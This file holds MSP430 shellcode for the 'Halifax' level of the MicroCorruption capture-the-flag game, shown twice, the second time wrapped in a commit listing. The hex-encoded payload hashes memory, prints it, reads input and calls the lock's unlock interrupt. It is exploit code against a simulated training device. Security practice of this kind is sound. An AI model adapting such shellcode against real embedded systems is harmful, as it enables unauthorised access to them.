MicroCorruption/25-Halifax/shellcode copy.asm

; just
6000 1c 0b43 1e43 3d400080 0f4b b012b645 3d500300 1b53 3b906000 f72b 3041

; where depth = number of nibbles in each truncated hash
;       msize = number of bytes per hash

;* depth 8, message size 2
;? completes in 67234 cycles
6000 6c
0b43 2e43 3d400080 0f4b b012b645 3d500400 1b53 3b902000 f72b
0b43 5e4b0080 4f4e 0f11 0f11 0f11 0f11 12c3 3ef00f00 3ff0 0f00 5f4f1047 b0127845 5f4e1047 b0127845 1b53 3b908000 e82b
3e4040003f400090b0126845
0f433d400090b012b645
3f407f00b0125045 3041


get_sram_hashes:
0b43 2e43 3d400080 0f4b b012b645 2d52 1b53 3b902000 f72b
0b43            clr r11             ; loop variable in r11
2e43            mov #2, r14         ; r14 = 2
3d40 0080       mov #0x8000, r13    ; set destination to 0x8000

loop:
0f4b            mov  r11, r15       ; mov addr r15
b012 b645       call #0x45b6        ; <sha256_internal>
2d52            add  #4, r13        ; keep 4 bytes of the output
1b53            inc  r11            ; inc r11
3b90 2000       cmp  #0x20, r11     ; do that 0x1000 times
f72b            jnc  $-0xe

print_hex:
0b43 5e4b0080 4f4e 0f11 0f11 0f11 0f11 12c3 3ef00f00 3ff0 0f00 5f4f1047 b0127845 5f4e1047 b0127845 1b53 3b908000 e82b

0b43            clr r11;
5e4b 0080       mov.b 0x8000(r11), r14
4f4e            mov.b r14, r15
0f11            rra.b r15
0f11            rra.b r15
0f11            rra.b r15
0f11            rra.b r15
12c3            clrc
3ef0 0f00       and   #0xf, r14
3ff0 0f00       and   #0xf, r15
5f4f 1047       mov.b 0x4710(r15), r15
b012 7845       call  #0x4578       ; <putchar>
5f4e 1047       mov.b 0x4710(r14), r15
b012 7845       call  #0x4578       ; <putchar>
1b53            add   0(r3), r11    ; inc r11
3b90 8000       cmp   #0x80, r11    ; do that 0x20*4 times
e82b            jnc   $-0x28

take_input:
3e4040003f400090b0126845

3e40 4000       mov   #0x40, r14
3f40 0090       mov   #0x9000, r15
b012 6845       call  #0x4568; <getsn>

check_password_questionmark:
0f433d400090b012b645

0f43            clr   r15
;3e40 0010       mov   #0x1000, r14  ; set length to 0x1000
3d40 0090       mov   #0x9000, r13  ; set buffer to 0x9000
b012 b645       call  #0x45b6       ; <sha256_internal>

unlock7f:
324000ffb0121000 0243 3041

324000ff        mov   #ff00, sr
b0121000        call  #0x10
0243            mov   #0, sr

30127f00b0125045
3012 7f00       push  0x7f
b012 5045       call  0x4550

3041            ret
Upload what I've got on Halifax so far 2023-01-09 09:54:47 +00:00			`; just`
			`6000 1c 0b43 1e43 3d400080 0f4b b012b645 3d500300 1b53 3b906000 f72b 3041`

			`; where depth = number of nibbles in each truncated hash`
			`; msize = number of bytes per hash`

			`;* depth 8, message size 2`
			`;? completes in 67234 cycles`
			`6000 6c`
			`0b43 2e43 3d400080 0f4b b012b645 3d500400 1b53 3b902000 f72b`
			`0b43 5e4b0080 4f4e 0f11 0f11 0f11 0f11 12c3 3ef00f00 3ff0 0f00 5f4f1047 b0127845 5f4e1047 b0127845 1b53 3b908000 e82b`
			`3e4040003f400090b0126845`
			`0f433d400090b012b645`
			`3f407f00b0125045 3041`


			`get_sram_hashes:`
			`0b43 2e43 3d400080 0f4b b012b645 2d52 1b53 3b902000 f72b`
			`0b43 clr r11 ; loop variable in r11`
			`2e43 mov #2, r14 ; r14 = 2`
			`3d40 0080 mov #0x8000, r13 ; set destination to 0x8000`

			`loop:`
			`0f4b mov r11, r15 ; mov addr r15`
			`b012 b645 call #0x45b6 ; <sha256_internal>`
			`2d52 add #4, r13 ; keep 4 bytes of the output`
			`1b53 inc r11 ; inc r11`
			`3b90 2000 cmp #0x20, r11 ; do that 0x1000 times`
			`f72b jnc $-0xe`

			`print_hex:`
			`0b43 5e4b0080 4f4e 0f11 0f11 0f11 0f11 12c3 3ef00f00 3ff0 0f00 5f4f1047 b0127845 5f4e1047 b0127845 1b53 3b908000 e82b`

			`0b43 clr r11;`
			`5e4b 0080 mov.b 0x8000(r11), r14`
			`4f4e mov.b r14, r15`
			`0f11 rra.b r15`
			`0f11 rra.b r15`
			`0f11 rra.b r15`
			`0f11 rra.b r15`
			`12c3 clrc`
			`3ef0 0f00 and #0xf, r14`
			`3ff0 0f00 and #0xf, r15`
			`5f4f 1047 mov.b 0x4710(r15), r15`
			`b012 7845 call #0x4578 ; <putchar>`
			`5f4e 1047 mov.b 0x4710(r14), r15`
			`b012 7845 call #0x4578 ; <putchar>`
			`1b53 add 0(r3), r11 ; inc r11`
			`3b90 8000 cmp #0x80, r11 ; do that 0x20*4 times`
			`e82b jnc $-0x28`

			`take_input:`
			`3e4040003f400090b0126845`

			`3e40 4000 mov #0x40, r14`
			`3f40 0090 mov #0x9000, r15`
			`b012 6845 call #0x4568; <getsn>`

			`check_password_questionmark:`
			`0f433d400090b012b645`

			`0f43 clr r15`
			`;3e40 0010 mov #0x1000, r14 ; set length to 0x1000`
			`3d40 0090 mov #0x9000, r13 ; set buffer to 0x9000`
			`b012 b645 call #0x45b6 ; <sha256_internal>`

			`unlock7f:`
			`324000ffb0121000 0243 3041`

			`324000ff mov #ff00, sr`
			`b0121000 call #0x10`
			`0243 mov #0, sr`

			`30127f00b0125045`
			`3012 7f00 push 0x7f`
			`b012 5045 call 0x4550`

			`3041 ret`